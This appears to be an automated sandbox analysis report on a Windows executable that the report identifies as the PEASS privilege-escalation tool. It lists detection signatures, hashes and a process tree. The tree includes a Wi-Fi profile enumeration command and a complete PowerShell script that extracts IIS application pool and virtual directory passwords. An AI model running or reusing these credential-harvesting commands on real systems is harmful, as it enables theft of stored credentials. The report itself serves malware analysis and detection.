Analysis

  • max time kernel
    148s
  • max time network
    155s
  • platform
    windows11-ltsc_2024_x64
  • resource
    win11ltsc2024-20260709-en
  • resource tags

    arch:x64arch:x86image:win11ltsc2024-20260709-enlocale:en-usos:windows11-ltsc_2024-x64systemwindows
  • submitted
    08/09/2026, 09:49

General

  • Target
    2026-09-07_98fe53d163077ddc51a3faf3fc1a33db_darkgate_glassworm_hijackloader_icedid.exe
  • Size 10.6MB
  • Sample260908-lthljsxdkf
  • SHA256 85a7c4b2e98889ff12112aec61c5e9e5b3d1af5e2032a16e6e3f7d8210f7155f
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Signatures

  • Family: PEASS, PEASS-ng, Peas

    PEASS is an open-source tool for privilege escalation.

  • Detects PEASS hacktool 1 IoCs
  • Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs
  • Detects executables manipulated with Fody 1 IoCs
  • Detects executables referencing Windows vault credential objects. Observed in infostealers 1 IoCs
  • Detects executables referencing many confidential data stores found in browsers, mail clients, crypt 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\2026-09-07_98fe53d163077ddc51a3faf3fc1a33db_darkgate_glassworm_hijackloader_icedid.exe
    "C:\Users\Admin\AppData\Local\Temp\2026-09-07_98fe53d163077ddc51a3faf3fc1a33db_darkgate_glassworm_hijackloader_icedid.exe"
    1⤵
    • Loads dropped DLL
    • Checks whether UAC is enabled
    • Enumerates connected drives
    • Checks processor information in registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4180
    • C:\Windows\SYSTEM32\systeminfo.exe
      "systeminfo.exe"
      2⤵
      • Gathers system information
      PID:248
    • C:\Windows\SYSTEM32\netsh.exe
      "netsh" wlan show profiles
      2⤵
      • Event Triggered Execution: Netsh Helper DLL
      • System Network Configuration Discovery: Wi-Fi Discovery
      PID:3744
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" # Check if appcmd.exe exists if (Test-Path ('C:\Windows\system32\inetsrv\appcmd.exe')) { # Create data table to house results $DataTable = New-Object System.Data.DataTable # Create and name columns in the data table $Null = $DataTable.Columns.Add('user') $Null = $DataTable.Columns.Add('pass') $Null = $DataTable.Columns.Add('type') $Null = $DataTable.Columns.Add('vdir') $Null = $DataTable.Columns.Add('apppool') # Get list of application pools Invoke-Expression 'C:\Windows\system32\inetsrv\appcmd.exe list apppools /text:name' | ForEach-Object { # Get application pool name $PoolName = $_ # Get username $PoolUserCmd = 'C:\Windows\system32\inetsrv\appcmd.exe list apppool ' + $PoolName + ' /text:processmodel.username' $PoolUser = Invoke-Expression $PoolUserCmd # Get password $PoolPasswordCmd = 'C:\Windows\system32\inetsrv\appcmd.exe list apppool ' + $PoolName + ' /text:processmodel.password' $PoolPassword = Invoke-Expression $PoolPasswordCmd # Check if credentials exists if (($PoolPassword -ne '') -and ($PoolPassword -isnot [system.array])) { # Add credentials to database $Null = $DataTable.Rows.Add($PoolUser, $PoolPassword,'Application Pool','NA',$PoolName) } } # Get list of virtual directories Invoke-Expression 'C:\Windows\system32\inetsrv\appcmd.exe list vdir /text:vdir.name' | ForEach-Object { # Get Virtual Directory Name $VdirName = $_ # Get username $VdirUserCmd = 'C:\Windows\system32\inetsrv\appcmd.exe list vdir ' + $VdirName + ' /text:userName' $VdirUser = Invoke-Expression $VdirUserCmd # Get password $VdirPasswordCmd = 'C:\Windows\system32\inetsrv\appcmd.exe list vdir ' + $VdirName + ' /text:password' $VdirPassword = Invoke-Expression $VdirPasswordCmd # Check if credentials exists if (($VdirPassword -ne '') -and ($VdirPassword -isnot [system.array])) { # Add credentials to database $Null = $DataTable.Rows.Add($VdirUser, $VdirPassword,'Virtual Directory',$VdirName,'NA') } } # Check if any passwords were found if( $DataTable.rows.Count -gt 0 ) { # Display results in list view that can feed into the pipeline #$DataTable | Sort-Object type,user,pass,vdir,apppool | Select-Object user,pass,type,vdir,apppool -Unique $DataTable | Select-Object user,pass,type,vdir,apppool } else { # Status user Write-host 'No application pool or virtual directory passwords were found.' } }
      2⤵
        PID:948

    Network

          MITRE ATT&CK Enterprise v16

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          sqlite.interop.dll

          • Path C:\Users\Admin\AppData\Local\Temp\Costura\27562734BD0EFF9434A8AA8BED4CA874\64\sqlite.interop.dll
          • Size 1.9MB
          • SHA256 5459fab6809a11c2148c235fdf8c431fe370d3f12ff25c054750f47082ccc1c9
          • MD5 SHA1 SHA512 SSDEEP TLSH

          memory/948-49-0x00000200C7A80000-0x00000200C7AA2000-memory.dmp

          memory/4180-26-0x000001A79F080000-0x000001A79F088000-memory.dmp

          memory/4180-27-0x000001A7866D0000-0x000001A7866DA000-memory.dmp

          memory/4180-7-0x00007FF806450000-0x00007FF806DF4000-memory.dmp

          memory/4180-8-0x00007FF806450000-0x00007FF806DF4000-memory.dmp

          memory/4180-9-0x00007FF806450000-0x00007FF806DF4000-memory.dmp

          memory/4180-10-0x00007FF806450000-0x00007FF806DF4000-memory.dmp

          memory/4180-11-0x00007FF806450000-0x00007FF806DF4000-memory.dmp

          memory/4180-12-0x00007FF806450000-0x00007FF806DF4000-memory.dmp

          memory/4180-13-0x00007FF806450000-0x00007FF806DF4000-memory.dmp

          memory/4180-23-0x000001A786830000-0x000001A786838000-memory.dmp

          memory/4180-15-0x00007FF806450000-0x00007FF806DF4000-memory.dmp

          memory/4180-16-0x00007FF806450000-0x00007FF806DF4000-memory.dmp

          memory/4180-17-0x00007FF806450000-0x00007FF806DF4000-memory.dmp

          memory/4180-18-0x00007FF806450000-0x00007FF806DF4000-memory.dmp

          memory/4180-19-0x00007FF806450000-0x00007FF806DF4000-memory.dmp

          memory/4180-21-0x000001A786840000-0x000001A78684A000-memory.dmp

          memory/4180-25-0x000001A7866F0000-0x000001A7866FA000-memory.dmp

          memory/4180-24-0x000001A786850000-0x000001A786868000-memory.dmp

          memory/4180-1-0x000001A783FC0000-0x000001A784A6A000-memory.dmp

          memory/4180-0-0x00007FF8065DF000-0x00007FF8065E0000-memory.dmp

          memory/4180-14-0x000001A786770000-0x000001A7867BA000-memory.dmp

          memory/4180-22-0x000001A79F050000-0x000001A79F076000-memory.dmp

          memory/4180-20-0x000001A79F580000-0x000001A79F634000-memory.dmp

          memory/4180-28-0x000001A79F090000-0x000001A79F0A8000-memory.dmp

          memory/4180-29-0x000001A79F810000-0x000001A79F9D2000-memory.dmp

          memory/4180-30-0x000001A79FF10000-0x000001A7A0438000-memory.dmp

          memory/4180-37-0x00007FF806450000-0x00007FF806DF4000-memory.dmp

          memory/4180-38-0x000001A79FCA0000-0x000001A79FCBE000-memory.dmp

          memory/4180-39-0x00007FF806450000-0x00007FF806DF4000-memory.dmp

          memory/4180-40-0x00007FF806450000-0x00007FF806DF4000-memory.dmp

          memory/4180-41-0x00007FF806450000-0x00007FF806DF4000-memory.dmp

          memory/4180-42-0x00007FF806450000-0x00007FF806DF4000-memory.dmp

          memory/4180-43-0x00007FF806450000-0x00007FF806DF4000-memory.dmp

          memory/4180-44-0x00007FF806450000-0x00007FF806DF4000-memory.dmp

          memory/4180-45-0x000001A79FEA0000-0x000001A79FEF0000-memory.dmp

          memory/4180-46-0x000001A79FE50000-0x000001A79FE5A000-memory.dmp

          memory/4180-2-0x00007FF806450000-0x00007FF806DF4000-memory.dmp

          memory/4180-51-0x00007FF806450000-0x00007FF806DF4000-memory.dmp